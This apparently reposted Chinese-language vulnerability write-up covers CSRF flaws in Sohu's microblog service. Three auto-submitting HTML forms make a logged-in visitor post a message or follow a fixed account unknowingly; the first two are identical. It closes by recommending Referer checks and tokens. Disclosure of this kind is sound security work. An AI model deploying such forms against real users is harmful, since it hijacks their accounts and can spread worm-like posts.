搜狐微博的几处CSRF漏洞分析与解决方法
程序员文章站
2022-06-19 11:53:50
搜狐某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博... 12-06-27...
搜狐某处csrf漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博
详细说明:
在接受post和get的信息的时候,未对post来路(referer)进行验证,同时也没有在post的信息中加token验证信息的正确性,导致漏洞产生。
漏洞地址:
复制代码
代码如下:http://t.sohu.com/t/twaction.jsp
<html> www.jb51.net
<body>
<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/t/twaction.jsp" method="post">
<input type="text" name="msg" value="xx" />
<input type="text" name="act" value="inserttwitter" />
<input type="text" name="groupid" value="0" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
接口返回信息
效果
第二个
复制代码
代码如下:http://t.sohu.com/t/twaction.jsp
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/t/twaction.jsp" method="post">
<input type="text" name="msg" value="xx" />
<input type="text" name="act" value="inserttwitter" />
<input type="text" name="groupid" value="0" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
返回信息
效果
第三个:
漏洞地址:
复制代码
代码如下:http://t.sohu.com/follow/addfollows
<html> www.jb51.net
<body>
<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/follow/addfollows" method="post">
<input type="text" name="act" value="follow" />
<input type="text" name="friendids" value="23117291" />
<input type="text" name="uid" value="23117291" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
接口返回信息
效果
修复方案:
检查post来路referer
在post的信息中加token
作者:imlonghao
上一篇: 常用的Linux网络安全工具简介
下一篇: 冰河”启示录